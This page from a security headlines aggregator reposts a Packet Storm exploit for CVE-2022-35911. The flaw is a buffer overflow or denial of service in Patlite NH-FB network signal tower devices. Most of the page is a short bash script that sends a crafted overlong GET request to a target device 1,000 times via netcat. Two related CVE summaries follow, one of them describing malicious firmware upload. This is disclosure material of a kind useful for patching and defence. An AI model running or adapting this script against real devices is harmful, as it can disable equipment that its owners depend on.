Security
Headlines
HeadlinesLatestCVEs

Headline

Patlite 1.46 Buffer Overflow

Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.

Packet Storm
#vulnerability#ubuntu#buffer_overflow#auth
# Exploit Title: CVE-2022-35911 - Patlite Overflow.# Date: 2022-07-07# Exploit Author: Samy Younsi - Necrum Security Labs# Vendor Homepage: https://www.patlite.co.jp# Software Link: https://www.patlite.co.jp/product/detail0000021462.html# Version: Versions 1.46 and bellow are affected# Tested on: CentOs & Ubuntu# CVE : CVE-2022-35911#!/bin/bashIP="192.168.1.101"PORT="80"for i in {0..1000}; do   echo "[$i]: ";   echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; done > /dev/null 2>&1

Related news

CVE-2022-38625: Patlite-NH-FB.md

Patlite NH-FB v1.46 and below was discovered to contain insufficient firmware validation during the upgrade firmware file upload process. This vulnerability allows authenticated attackers to create and upload their own custom-built firmware and inject malicious code.

CVE-2022-35911: PATLITE / IoT / 見える化|PATLITE

On Patlite NH-FB series devices through 1.46, remote attackers can cause a denial of service by omitting the query string.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6